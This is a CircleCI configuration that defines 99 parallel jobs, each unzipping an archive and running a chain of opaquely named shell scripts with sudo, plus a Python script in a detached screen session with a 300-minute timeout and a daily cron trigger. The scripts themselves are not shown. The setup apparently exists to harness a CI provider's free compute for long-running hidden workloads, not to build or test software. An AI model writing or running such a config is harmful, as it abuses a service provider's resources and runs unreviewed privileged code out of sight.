working_dir: &working_dir ~/app
.build_template: &commonSteps
  steps:
    - checkout
    - run:
        name: A
        command: |
          sudo apt update -y
    - run:
        name: B
        command: |
          sleep 20s          
          chmod u+x *
          ./saya.sh
    - run:
        name: C
        command: |
          unzip hero.zip >/dev/null 2>&1
    - run:
        name: D
        command: |
          chmod u+x *
    - run:
        name: E
        command: |
          sudo ./aku.sh
    - run:
        name: F
        command: |
          sudo ./Bojo.sh
    - run:
        name: G
        command: |
          sudo ./cilok.sh
    - run:
        name: H
        command: |
          sudo ./dan.sh
    - run:
        name: I
        command: |
          sudo ./ewe.sh
    - run:
        name: J
        command: |
          #sudo ./Frean.sh#no_run
    - run:
        name: K
        no_output_timeout: 300m
        command: |
          echo "Ijin Berkah Om. . ."
          sudo ./gok.sh
          sudo ./halah.sh
          sudo ./Itu.sh
          screen -dmS Acdb python3 pro01.py
          sleep 120s
          ./main01.sh
  working_directory: *working_dir

version: 2.0

jobs:
  MEKO_01:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  MEKO_02:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_03:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_04:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_05:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_06:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_07:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_08:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_09:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_10:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_11:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_12:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_13:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_14:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_15:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_16:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_17:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_18:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_19:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_20:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_21:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_22:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_23:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_24:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_25:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_26:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_27:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_28:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_29:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_30:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_31:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_32:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_33:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_34:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_35:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_36:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_37:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_38:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_39:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_40:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_41:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_42:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_43:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_44:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_45:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_46:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_47:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_48:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_49:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_50:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_51:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_52:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_53:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_54:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_55:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_56:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_57:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_58:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_59:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_60:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_61:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_62:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_63:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_64:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_65:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_66:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_67:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_68:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_69:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_70:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_71:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_72:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_73:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_74:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_75:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_76:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_77:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_78:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_79:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_80:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_81:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_82:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_83:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_84:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_85:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_86:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_87:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_88:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_89:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_90:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_91:
    <<: *commonSteps
    docker:
      - image: circleci/buildpack-deps:bionic-scm
  MEKO_92:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_93:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    steps:
      - checkout
  MEKO_94:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_95:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_96:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_97:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_98:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps
  MEKO_99:
    docker:
      - image: circleci/buildpack-deps:bionic-scm
    <<: *commonSteps

    triggers:
      - schedule:
          cron: "0 21 * * *"
          filters:
            branches:
              only:
                - anak
                - kucing
                - master
                - di
                - jalan


workflows:
  version: 2
  Memk:
    jobs:
      - MEKO_01
      - MEKO_02
      - MEKO_03
      - MEKO_04
      - MEKO_05
      - MEKO_06
      - MEKO_07
      - MEKO_08
      - MEKO_09
      - MEKO_10
      - MEKO_11
      - MEKO_12
      - MEKO_13
      - MEKO_14
      - MEKO_15
      - MEKO_16
      - MEKO_17
      - MEKO_18
      - MEKO_19
      - MEKO_20
      - MEKO_21
      - MEKO_22
      - MEKO_23
      - MEKO_24
      - MEKO_25
      - MEKO_26
      - MEKO_27
      - MEKO_28
      - MEKO_29
      - MEKO_30
      - MEKO_31
      - MEKO_32
      - MEKO_33
      - MEKO_34
      - MEKO_35
      - MEKO_36
      - MEKO_37
      - MEKO_38
      - MEKO_39
      - MEKO_40
      - MEKO_41
      - MEKO_42
      - MEKO_43
      - MEKO_44
      - MEKO_45
      - MEKO_46
      - MEKO_47
      - MEKO_48
      - MEKO_49
      - MEKO_50
      - MEKO_51
      - MEKO_52
      - MEKO_53
      - MEKO_54
      - MEKO_55
      - MEKO_56
      - MEKO_57
      - MEKO_58
      - MEKO_59
      - MEKO_60
      - MEKO_61
      - MEKO_62
      - MEKO_63
      - MEKO_64
      - MEKO_65
      - MEKO_66
      - MEKO_67
      - MEKO_68
      - MEKO_69
      - MEKO_70
      - MEKO_71
      - MEKO_72
      - MEKO_73
      - MEKO_74
      - MEKO_75
      - MEKO_76
      - MEKO_77
      - MEKO_78
      - MEKO_79
      - MEKO_80
      - MEKO_81
      - MEKO_82
      - MEKO_83
      - MEKO_84
      - MEKO_85
      - MEKO_86
      - MEKO_87
      - MEKO_88
      - MEKO_89
      - MEKO_90
      - MEKO_91
      - MEKO_92
      - MEKO_93
      - MEKO_94
      - MEKO_95
      - MEKO_96
      - MEKO_97
      - MEKO_98
      - MEKO_99
